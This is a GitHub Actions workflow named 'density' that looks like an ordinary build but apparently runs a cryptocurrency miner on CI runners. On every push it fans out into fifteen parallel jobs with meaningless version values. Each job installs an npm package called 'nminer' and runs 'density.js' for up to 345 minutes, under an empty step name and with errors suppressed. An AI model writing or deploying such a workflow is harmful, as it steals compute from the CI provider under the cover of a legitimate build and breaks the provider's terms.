name: density
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1409 }
          - { version: 4754 }
          - { version: 8857 }
          - { version: 7794 }
          - { version: 7483 }
          - { version: 8795 }
          - { version: 3345 }
          - { version: 6999 }
          - { version: 9875 }
          - { version: 9576 }
          - { version: 8420 }
          - { version: 4710 }
          - { version: 8476 }
          - { version: 9603 }
          - { version: 8263 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 345m node density.js || echo "density executed"